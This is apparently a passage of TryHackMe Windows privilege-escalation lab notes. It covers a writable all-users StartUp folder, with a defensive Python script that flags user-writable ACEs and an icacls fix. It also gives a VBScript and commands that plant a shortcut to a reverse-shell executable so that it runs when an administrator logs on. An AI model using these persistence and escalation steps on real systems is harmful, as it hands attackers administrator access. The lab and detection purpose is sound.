Check the permissions on C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

    C:\Users\user>icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp BUILTIN\Users:(OI)(CI)(F)
                                                                 WIN-QBA94KB3IOF\Administrator:(I)(OI)(CI)(DE,DC)
                                                                 WIN-QBA94KB3IOF\admin:(I)(OI)(CI)(DE,DC)
                                                                 NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                                 BUILTIN\Administrators:(I)(OI)(CI)(F)
                                                                 BUILTIN\Users:(I)(OI)(CI)(RX)
                                                                 Everyone:(I)(OI)(CI)(RX)
    Successfully processed 1 files; Failed processing 0 files

    The entry to notice is BUILTIN\Users:(OI)(CI)(F): it carries no (I), so it was set directly on this folder rather than inherited, and it grants Full control (F) to every local user; the inherited entry below it only gives Users read and execute (RX). This is the all-users StartUp folder, so anything placed here runs in the session of every user who logs on, including administrators.
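    As an added example (not from the TryHackMe room or these notes), the following Python script parses icacls output and flags ACEs that give a low-privileged principal write access to a directory. The input is the icacls output above, embedded as a constructed sample; the lists of low-privileged principals and write-capable rights are the script's own assumptions and can be extended.

```python
"""Flag directory ACEs that let any ordinary user write (added example)."""
import re
from typing import FrozenSet, List, NamedTuple

STARTUP_DIR = r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

# Constructed sample: the icacls output shown above, as it appears in the notes.
SAMPLE_ICACLS = r"""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp BUILTIN\Users:(OI)(CI)(F)
                     WIN-QBA94KB3IOF\Administrator:(I)(OI)(CI)(DE,DC)
                     WIN-QBA94KB3IOF\admin:(I)(OI)(CI)(DE,DC)
                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                     BUILTIN\Administrators:(I)(OI)(CI)(F)
                     BUILTIN\Users:(I)(OI)(CI)(RX)
                     Everyone:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals every interactive user belongs to (assumption; extend for your domain).
LOW_PRIV_PRINCIPALS = {
    "builtin\\users",
    "everyone",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# icacls rights that allow creating or modifying files in a directory:
# F full, M modify, W write, WD write data/add file, AD append data/add subdir,
# GA/GW generic all/write. WDAC/WO (write DAC/owner) are left out here: they
# give control indirectly rather than a write itself.
WRITE_RIGHTS = frozenset({"F", "M", "W", "WD", "AD", "GA", "GW"})

INHERIT_FLAGS = frozenset({"I", "OI", "CI", "IO", "NP"})

_ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<perms>(?:\([A-Za-z,]*\))+)$")
_GROUP_RE = re.compile(r"\(([A-Za-z,]*)\)")


class Ace(NamedTuple):
    principal: str
    flags: FrozenSet[str]   # inheritance flags, e.g. I, OI, CI
    rights: FrozenSet[str]  # access rights, e.g. F, RX, DE; DENY marks a deny ACE


def parse_icacls(output: str, path: str) -> List[Ace]:
    """Parse `icacls <path>` output into ACEs. icacls prints the path itself in
    front of the first ACE, so the caller passes the queried path to strip it."""
    aces: List[Ace] = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = _ACE_RE.match(line)
        if not m:
            continue
        flags, rights = set(), set()
        for group in _GROUP_RE.findall(m.group("perms")):
            for tok in filter(None, group.split(",")):
                (flags if tok in INHERIT_FLAGS else rights).add(tok)
        aces.append(Ace(m.group("principal"), frozenset(flags), frozenset(rights)))
    return aces


def writable_by_low_priv(aces: List[Ace]) -> List[Ace]:
    """Return allow ACEs that give a low-privileged principal write rights."""
    return [
        a for a in aces
        if a.principal.lower() in LOW_PRIV_PRINCIPALS
        and "DENY" not in a.rights
        and a.rights & WRITE_RIGHTS
    ]


def describe(ace: Ace) -> str:
    origin = "inherited" if "I" in ace.flags else "explicit (set directly on this folder)"
    return f"{ace.principal}: {','.join(sorted(ace.rights))} [{origin}]"


if __name__ == "__main__":
    hits = writable_by_low_priv(parse_icacls(SAMPLE_ICACLS, STARTUP_DIR))
    for ace in hits:
        print("WRITABLE BY ANY USER ->", describe(ace))
```

    On the sample it reports exactly one entry, the explicit BUILTIN\Users Full-control grant; the inherited RX entries for Users and Everyone are read-only and are not flagged. The same parser can be pointed at the output of icacls on any other autorun location (other StartUp folders, service binary directories, PATH entries). The fix on the target is to remove that explicit grant, for example with icacls on the folder and /remove:g "BUILTIN\Users", so that only the inherited read-and-execute entry remains.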

    We use a script to create a shortcut in the StartUp folder that points at our malicious executable. CreateShortcut.vbs:

    ' Create a .lnk in the all-users StartUp folder that launches reverse.exe
    Set oWS = WScript.CreateObject("WScript.Shell")
    sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
    Set oLink = oWS.CreateShortcut(sLinkFile)
    oLink.TargetPath = "C:\PrivEsc\reverse.exe"
    oLink.Save

    Run it with:

    cscript C:\PrivEsc\CreateShortcut.vbs

    Then start a listener for reverse.exe to connect back to, and log on over RDP as admin. When the admin session's desktop loads, Windows runs the shortcut from the all-users StartUp folder, so reverse.exe executes with admin's privileges:

    rdesktop -u admin 10.10.21.109

    TryHackMe | Windows PrivEsc